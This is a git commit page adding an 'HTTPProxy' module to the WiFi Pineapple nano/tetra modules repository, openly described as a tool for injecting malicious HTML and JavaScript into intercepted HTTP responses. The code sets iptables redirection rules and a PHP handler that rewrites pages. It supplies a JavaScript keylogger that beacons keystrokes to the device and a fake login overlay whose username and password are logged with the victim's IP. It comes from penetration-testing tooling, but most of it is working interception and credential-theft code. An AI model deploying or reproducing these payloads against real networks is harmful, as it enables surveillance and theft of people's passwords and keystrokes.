hak5
/
nano-tetra-modules
mirror of https://github.com/hak5/nano-tetra-modules.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

HTTPProxy Module (#1) 

HTTPProxy will allow you to intercept the HTTP response and injection a malicious HTML/JavaScript code, also it has a keylogger written in JavaScript which allows the attacker to log the user inputs
pull/2/head
malduhaymi 2017-11-19 23:49:08 +03:00 committed by Sebastian Kinne
parent d0aa1e38ef
commit d613645576
11 changed files with 958 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

345
HTTPProxy/api/module.php Normal file
View File

@ -0,0 +1,345 @@
<?php namespace pineapple;
class HTTPProxy extends Module
{
// CONSTANTS
public function route()
{
switch ($this->request->action) {
case 'Start':
$this->start();
break;
case 'Stop':
$this->stop();
break;
case 'save':
$this->saveHTML($this->request->htmlvalue);
break;
case 'getHtml':
$this->GetHtml();
break;
case 'viewResponsePage':
$this->viewResponsePage();
break;
case 'updateResponsePage':
$this->updateResponsePage($this->request->phpCode);
break;
case 'viewLog':
$this->viewLog();
break;
case 'enableKeyLogger':
$this->enableKeyLogger();
break;
case 'disableKeyLogger':
$this->disableKeyLogger();
break;
case 'viewKeyLoggerLog':
$this->viewKeyLoggerLog();
break;
case 'viewHTTPProxyHandler':
$this->viewHTTPProxyHandler();
break;
case 'updateHTTPProxyHandlerPage':
$this->updateHTTPProxyHandlerPage($this->request->HTTPProxyHandlerCode);
break;
}
}
public function start(){
if (!$this->checkProxyRunning()) {
$running = $this->startHttpProxy();
if (!$running) {
$message = "Error starting HTML Injection.";
}
else{
// copy index.php to /www
$message = "started!";
exec("cp /pineapple/modules/HTTPProxy/assets/index/index.php /www/index.php") ;
exec("cp /pineapple/modules/HTTPProxy/assets/response/responsePage.php /www/responsePage.php") ;
exec("cp /pineapple/modules/HTTPProxy/assets/keylogger/keylogger.php /www/keylogger.php") ;
exec("cp /pineapple/modules/HTTPProxy/assets/jquery.min.js /www/jquery.min.js") ;
}
}
else{
$message="ALready Started";
}
$this->response = $message ;
}
public function stop(){
$running = !$this->stopHttpProxy();
$message = "Stopped HTTPProxy.";
if (!$running) {
$message = "Error stopping HTML Injection.";
}
else{
//exec("cp /www/index.php /www/index2.php") ;
exec("rm /www/index.php") ;
exec("rm /www/responsePage.php") ;
exec("rm /www/keylogger.php") ;
exec("rm /www/jquery.min.js") ;
}
/* $response_array = array(
"control_success" => $running,
"control_message" => $message
);*/
$this->response = $message ;
}
public function saveHTML($html){
$htmlFile = fopen("/pineapple/modules/HTTPProxy/assets/HTML/htmlFile.txt", "w") ;
$out=fwrite($htmlFile, $html);
fclose($myfile);
if($out>0){
$this->response = "Saved!";
}
else{
$this->response = "Error.Not Saved!";
}
}
public function checkProxyRunning()
{
return exec("iptables -t nat -L PREROUTING | grep 172.16.42.1") == '' ? false : true;
}
public function startHttpProxy()
{
// Enable forwarding. It should already be enabled on the pineapple but do it anyways just to be safe
exec("echo 1 > /proc/sys/net/ipv4/ip_forward");
// Configure other rules
exec("iptables -t nat -A PREROUTING -s 172.16.42.0/24 -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80");
exec("iptables -A INPUT -p tcp --dport 53 -j ACCEPT");
// Drop everything else
exec("iptables -I INPUT -p tcp --dport 443 -j DROP");
return $this->checkProxyRunning();
}
public function stopHttpProxy()
{
exec("iptables -t nat -D PREROUTING -s 172.16.42.0/24 -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80");
exec("iptables -D INPUT -p tcp --dport 53 -j ACCEPT");
exec("iptables -D INPUT -j DROP");
return $this->checkProxyRunning();
}
public function GetHtml()
{
$htmlFile = fopen("/pineapple/modules/HTTPProxy/assets/HTML/htmlFile.txt", "r") ;
$HTTPProxy=fread($htmlFile,10000);
$this->response = $HTTPProxy;
}
public function viewResponsePage(){
$phpCode = fopen("/pineapple/modules/HTTPProxy/assets/response/responsePage.php", "r") ;
$phpCode=fread($phpCode,10000);
$this->response = $phpCode;
}
public function updateResponsePage($phpCode){
$phpFile = fopen("/pineapple/modules/HTTPProxy/assets/response/responsePage.php", "w") ;
$out=fwrite($phpFile, $phpCode);
fclose($phpFile);
if($out>0){
$this->response = "Saved!";
}
else{
$this->response = "Error.Not Saved!";
}
}
public function viewLog(){
$logFile = fopen("/pineapple/modules/HTTPProxy/assets/logFile.txt", "r") ;
$logFile=fread($logFile,10000);
if($logFile!=""){
$this->response = $logFile;
}
else{
$this->response="Empty Logs!";
}
}
public function enableKeyLogger(){
// javsScript keylogger
// this code from this github account https://github.com/JohnHoder/Javascript-Keylogger
$keyLoggerJavaScript="
<script>
var keys='';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = 'http://172.16.42.1/keylogger.php?c='+keys;
keys = '';
}, 1000);
</script>
";
$this->saveHTML($keyLoggerJavaScript);
$this->response =$keyLoggerJavaScript;
}
public function disableKeyLogger(){
$normalHTML="
<div style= 'position: fixed; top: 20px; left: 20px; height: 200px;background:white;color:black'>
<form>
Username : <input type='text' id='username'>
Password : <input type='text' id='pass'>
<button>Login</button>
</form>
</div>
<script src='http://172.16.42.1/jquery.min.js'></script>
<script>
$('button').click(function(){
$.ajax({url: 'http://172.16.42.1/responsePage.php?username='+document.getElementById('username').value+'&pass='+document.getElementById('pass').value, success: function(result){
}});
});
</script>
";
$this->saveHTML($normalHTML);
$this->response =$normalHTML;
}
public function viewKeyLoggerLog(){
$logFile = fopen("/pineapple/modules/HTTPProxy/assets/keylogger/dataKeyLogger.txt", "r") ;
$logFile=fread($logFile,1000);
if($logFile!=""){
$this->response = $logFile;
}
else{
$this->response="Empty Logs!";
}
}
/*function saveInjectionScope($selectedOption,$specificUrls,$excludeUrls){
$setting="selectedOption : ".$selectedOption."\n specificUrls : ".$specificUrls."\n excludeUrls : ".$excludeUrls;
$injectionScopeFile= fopen("/pineapple/modules/HTTPProxy/assets/injectionScope.txt", "w") ;
$out=fwrite($injectionScopeFile, $setting);
fclose($injectionScopeFile);
if($out>0){
$this->response = "Saved!";
}
else{
$this->response = "Error.Not Saved!";
}
} */
public function viewHTTPProxyHandler(){
$viewHTTPProxyHandlerCode = fopen("/pineapple/modules/HTTPProxy/assets/index/index.php", "r") ;
$viewHTTPProxyHandlerCode=fread($viewHTTPProxyHandlerCode,10000);
$this->response = $viewHTTPProxyHandlerCode;
}
public function updateHTTPProxyHandlerPage($HTTPProxyHandlerCode){
$phpFile = fopen("/pineapple/modules/HTTPProxy/assets/index/index.php", "w") ;
$out=fwrite($phpFile, $HTTPProxyHandlerCode);
fclose($phpFile);
if($out>0){
$this->response = "Saved!";
exec("cp /pineapple/modules/HTTPProxy/assets/index/index.php /www/index.php") ;
}
else{
$this->response = "Error.Not Saved!";
}
}
}

24
HTTPProxy/assets/HTML/htmlFile.txt Normal file
View File

@ -0,0 +1,24 @@
<div style= 'position: fixed; top: 20px; left: 20px; height: 200px;background:white;color:black'>
<form>
Username : <input type='text' id='username'>
Password : <input type='text' id='pass'>
<button>Login</button>
</form>
</div>
<script src='http://172.16.42.1/jquery.min.js'></script>
<script>
$('button').click(function(){
$.ajax({url: 'http://172.16.42.1/responsePage.php?username='+document.getElementById('username').value+'&pass='+document.getElementById('pass').value, success: function(result){
}});
});
</script>

19
HTTPProxy/assets/index/index.php Normal file
View File

@ -0,0 +1,19 @@
<?php
// HTTPProxy version 1.0 only handle HTTP Get Request , in the next version we will handle POST requests.
header('Content-Type: text/html');
header_remove('Content-Type');
$url=$_SERVER['HTTP_HOST'];
$_SERVER['REQUEST_URI'];
$y=file_get_contents("http://".$url.$_SERVER['REQUEST_URI']);
// read HTML injection
$htmlFile = fopen("/pineapple/modules/HTTPProxy/assets/HTML/htmlFile.txt", "r") ;
$htmlInjection=fread($htmlFile,10000);
echo $copy_date = preg_replace("'</body>'", $htmlInjection."</body>", $y);

4
HTTPProxy/assets/jquery.min.js vendored Normal file
View File

File diff suppressed because one or more lines are too long

0
HTTPProxy/assets/keylogger/dataKeyLogger.txt Normal file
View File

15
HTTPProxy/assets/keylogger/keylogger.php Normal file
View File

@ -0,0 +1,15 @@
<?php
header('Access-Control-Allow-Methods: GET, REQUEST, OPTIONS');
header('Access-Control-Allow-Credentials: true');
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Headers: Content-Type, *');
$file = '/pineapple/modules/HTTPProxy/assets/keylogger/dataKeyLogger.txt';
if(isset($_REQUEST['c']) && !empty($_REQUEST['c']))
{
file_put_contents($file, $_REQUEST['c'], FILE_APPEND);
// $key= fopen($file , "w") ;
// $out=fwrite($key, $_REQUEST['c']);
// fclose($key);
}
?>

0
HTTPProxy/assets/logFile.txt Normal file
View File

33
HTTPProxy/assets/response/responsePage.php Normal file
View File

@ -0,0 +1,33 @@
<?php
$ipaddress = '';
if (getenv('HTTP_CLIENT_IP'))
$ipaddress = getenv('HTTP_CLIENT_IP');
else if(getenv('HTTP_X_FORWARDED_FOR'))
$ipaddress = getenv('HTTP_X_FORWARDED_FOR');
else if(getenv('HTTP_X_FORWARDED'))
$ipaddress = getenv('HTTP_X_FORWARDED');
else if(getenv('HTTP_FORWARDED_FOR'))
$ipaddress = getenv('HTTP_FORWARDED_FOR');
else if(getenv('HTTP_FORWARDED'))
$ipaddress = getenv('HTTP_FORWARDED');
else if(getenv('REMOTE_ADDR'))
$ipaddress = getenv('REMOTE_ADDR');
else
$ipaddress = 'UNKNOWN';
$url="URL : ".$_SERVER['HTTP_REFERER'] ;
$string= "QUERY_STRING : " . $_SERVER['QUERY_STRING'];
$ip= "USER IP: ".$ipaddress;
//$myfile = fopen("/pineapple/modules/HTTPProxy/assets/logFile.txt", "w") or die("Unable to open file!");
//fwrite($myfile, $txt);
$txt = $url."\n". $string."\n".$ip."\n";
$file="/pineapple/modules/HTTPProxy/assets/logFile.txt";
file_put_contents($file, $txt, FILE_APPEND);
?>

237
HTTPProxy/js/module.js Normal file
View File

@ -0,0 +1,237 @@
registerController('HTTPProxyPortalController', ['$api', '$scope', function($api, $scope) {
$scope.htmlValue="";
$scope.handleRequest = function (action) {
if(action=="Start"){
$api.request({
module: 'HTTPProxy',
action: 'Start' //Your action defined in module.php
}, function(response) {
$scope.resp = response;
console.log(response)
});
}
if(action=="Stop"){
$api.request({
module: 'HTTPProxy',
action: 'Stop' //Your action defined in module.php
}, function(response) {
$scope.resp = response;
console.log(response)
});
}
}
$scope.saveHtml = function () {
//save HTML into File.
$api.request({
module: 'HTTPProxy',
action: 'save' ,
htmlvalue:$scope.htmlValue
}, function(response) {
$scope.resp = response;
console.log(response)
});
}
$scope.FunCall = function () {
// get HTML
$api.request({
module: 'HTTPProxy',
action: 'getHtml'
}, function(response) {
$scope.htmlValue = response;
console.log(response)
});
}
$scope.viewResponsePage = function () {
$api.request({
module: 'HTTPProxy',
action: 'viewResponsePage'
}, function(response) {
$scope.phpCode = response
console.log(response)
});
}
$scope.updateResponsePage = function () {
$api.request({
module: 'HTTPProxy',
action: 'updateResponsePage' ,
phpCode:$scope.phpCode
}, function(response) {
$scope.resp = response
console.log(response)
});
}
$scope.viewLog = function () {
$api.request({
module: 'HTTPProxy',
action: 'viewLog'
}, function(response) {
$scope.logFile = response
console.log(response)
});
}
$scope.enableKeyLogger = function () {
$api.request({
module: 'HTTPProxy',
action: 'enableKeyLogger'
}, function(response) {
// $scope.resp = response
document.getElementById("htmlvalue").value= response
console.log(response)
});
}
$scope.disableKeyLogger = function () {
$api.request({
module: 'HTTPProxy',
action: 'disableKeyLogger'
}, function(response) {
document.getElementById("htmlvalue").value= response
console.log(response)
});
}
$scope.viewKeyLoggerLog = function () {
$api.request({
module: 'HTTPProxy',
action: 'viewKeyLoggerLog'
}, function(response) {
$scope.viewKeyLoggerLogText = response
console.log(response)
});
}
/*$scope.options = [
{
name: 'Full URLs',
value: '1'
},
{
name: 'Specific URLs',
value: '2'
},
{
name: 'Exclude URLs',
value: '3'
}
];
$scope.selectedOption = $scope.options[0];
$scope.updateSelected = function() {
}
$scope.saveInjectionScope = function () {
$api.request({
module: 'HTTPProxy',
action: 'saveInjectionScope',
selectedOption:$scope.selectedOption.value,
specificUrls:$scope.specificUrls,
excludeUrls:$scope.excludeUrls
}, function(response) {
$scope.resp = response
console.log(response)
});
}
*/
$scope.viewHTTPProxyHandler = function () {
$api.request({
module: 'HTTPProxy',
action: 'viewHTTPProxyHandler'
}, function(response) {
$scope.HTTPProxyHandlerCode = response
console.log(response)
});
}
$scope.updateHTTPProxyHandlerPage = function () {
$api.request({
module: 'HTTPProxy',
action: 'updateHTTPProxyHandlerPage' ,
HTTPProxyHandlerCode:$scope.HTTPProxyHandlerCode
}, function(response) {
$scope.HTTPProxyHandlerResp = response
console.log(response)
});
}
}]);

271
HTTPProxy/module.html Normal file
View File

@ -0,0 +1,271 @@
<!-- This HTML has bootstrap classes such as "col-md-12" and "jumbotron". For more information, see http://getbootstrap.com/css/ -->
<!-- This HTML makes use of AngularJS data-bindings and controllers. For more information, see https://docs.angularjs.org/api/ -->
<!-- Don't forget to look at the module.js and module.php files too! -->
<!-- This HTML is a template for generated modules via the Module Maker. -->
<div class="col-md-12" ng-controller="HTTPProxyPortalController">
<div class="row ng-scope">
<div class="col-md-12">
<div class="panel panel-default ng-scope" ng-controller="HTTPProxyPortalController">
<div class="panel-heading">
<h3 class="panel-title">Controls</h3>
</div>
<div class="panel-body">
<button class="btn btn-primary btn-lg" ng-click="handleRequest('Start')" >Start HTTP Proxy Handler</button >
<button class="btn btn-primary btn-lg" ng-click="handleRequest('Stop')" >Stop HTTP Proxy Handler</button >
<br/>
</br>
<button type="button" class="btn btn-sm btn-default" data-toggle="modal" data-target="#ModalHTTPProxyHandler" ng-click="viewHTTPProxyHandler()">View/Edit HTTP Proxy Handler</button>
<p class="alert ">{{ resp }}</p>
<!-- Modal -->
<div id="ModalHTTPProxyHandler" class="modal fade" role="dialog">
<div class="modal-dialog">
<!-- Modal content-->
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal">&times;</button>
<h4 class="modal-title">Response Page Code : </h4>
</div>
<div class="modal-body">
<textarea class="form-control" style="min-width: 100%;height:200px" ng-model="HTTPProxyHandlerCode">
{{ HTTPProxyHandlerCode }}
</textarea>
<p class="alert ">{{ HTTPProxyHandlerResp }}</p>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-default" ng-click="updateHTTPProxyHandlerPage()">Update</button>
<button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="row ng-scope">
<div class="col-md-12">
<div class="panel panel-default ng-scope" ng-controller="HTTPProxyPortalController">
<div class="panel-heading">
<h3 class="panel-title">HTML Injection</h3>
</div>
<div class="panel-body">
HTML Code: <textarea class="form-control" style="min-width: 100%;height:200px" ng-model="htmlValue" ng-init="FunCall()" id="htmlvalue">{{ htmlValue }}</textarea>
<br/>
<button class="btn btn-sm btn-default" ng-click="saveHtml()">Save HTML</button >
<button class="btn btn-sm btn-default" ng-click="disableKeyLogger()">Reset HTML</button >
<p class="alert ">{{ resp }}</p>
</div>
</div>
</div>
<div class="col-md-6">
<div class="panel panel-default ng-scope" ng-controller="HTTPProxyPortalController">
<div class="panel-heading">
<h3 class="panel-title">Response.php Settings</h3>
</div>
<div class="panel-body">
Response Page :
</br>
<button type="button" class="btn btn-sm btn-default" data-toggle="modal" data-target="#myModal" ng-click="viewResponsePage()">View/Edit response page</button>
<!-- Modal -->
<div id="myModal" class="modal fade" role="dialog">
<div class="modal-dialog">
<!-- Modal content-->
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal">&times;</button>
<h4 class="modal-title">Response Page Code : </h4>
</div>
<div class="modal-body">
<textarea class="form-control" style="min-width: 100%;height:200px" ng-model="phpCode">
{{ phpCode }}
</textarea>
<p class="alert ">{{ resp }}</p>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-default" ng-click="updateResponsePage()">Update</button>
<button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
</div>
</div>
</div>
</div>
<!-- Modal -->
<div id="log" class="modal fade" role="dialog">
<div class="modal-dialog">
<!-- Modal content-->
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal">&times;</button>
<h4 class="modal-title">Log File : </h4>
</div>
<div class="modal-body">
<p>
{{ logFile }}
</p>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
</div>
</div>
</div>
</div>
</br>
</br>
<button type="button" class="btn btn-sm btn-default" data-toggle="modal" data-target="#log" ng-click="viewLog()">View Log File</button>
</div>
</div>
</div>
<div class="col-md-6">
<div class="panel panel-default ng-scope" ng-controller="HTTPProxyPortalController">
<div class="panel-heading">
<h3 class="panel-title">Keylogger Settings</h3>
</div>
<div class="panel-body">
<button class="btn btn-sm btn-default" ng-click="enableKeyLogger()">Enable keyLogger</button >
<br/>
<br/>
<button class="btn btn-sm btn-default" ng-click="disableKeyLogger()">Disable keyLogger</button >
<br/>
</br>
<button type="button" class="btn btn-sm btn-default" data-toggle="modal" data-target="#viewKeyLoggerLog" ng-click="viewKeyLoggerLog()">View Log File</button>
<!-- Modal -->
<div id="viewKeyLoggerLog" class="modal fade" role="dialog">
<div class="modal-dialog">
<!-- Modal content-->
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal">&times;</button>
<h4 class="modal-title">View KeyLogger Log</h4>
</div>
<div class="modal-body">
<p>
{{ viewKeyLoggerLogText }}
</p>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
</div>
</div>
</div>
</div>
<!-- end -->
</div>
</div>
</div>
<!-- <div class="col-md-4">
<div class="panel panel-default ng-scope" ng-controller="HTTPProxyPortalController">
<div class="panel-heading">
<h3 class="panel-title">Injection Scope </h3>
</div>
<div class="panel-body">
Apply on :
<br/>
<select
ng-model="selectedOption"
ng-options="option.name for option in options" ng-change="updateSelected()">
</select>
<br/>
<br/>
<div class="form-group" ng-show="selectedOption.value == '2'">
<input type="text" ng-model="specificUrls" placeholder="exmaple:www.hak5.com , www.google.com"/>
</div>
<div class="form-group" ng-show="selectedOption.value == '3'">
<input type="text" ng-model="excludeUrls" placeholder="exmaple:www.hak5.com , www.google.com" />
</div>
<button class="btn btn-sm btn-default" ng-click="saveInjectionScope()">Save</button >
<p>{{ resp }}</p>
</div>
</div>
</div>
</div> !-->
</div>
</div>
</div>
</div>

10
HTTPProxy/module.info Normal file
View File

@ -0,0 +1,10 @@
{
"title": "HTTP Proxy",
"description": "HTTP Proxy",
"version": "1.0",
"devices": [
"nano",
"tetra"
],
"author": "Malduhaymi"
}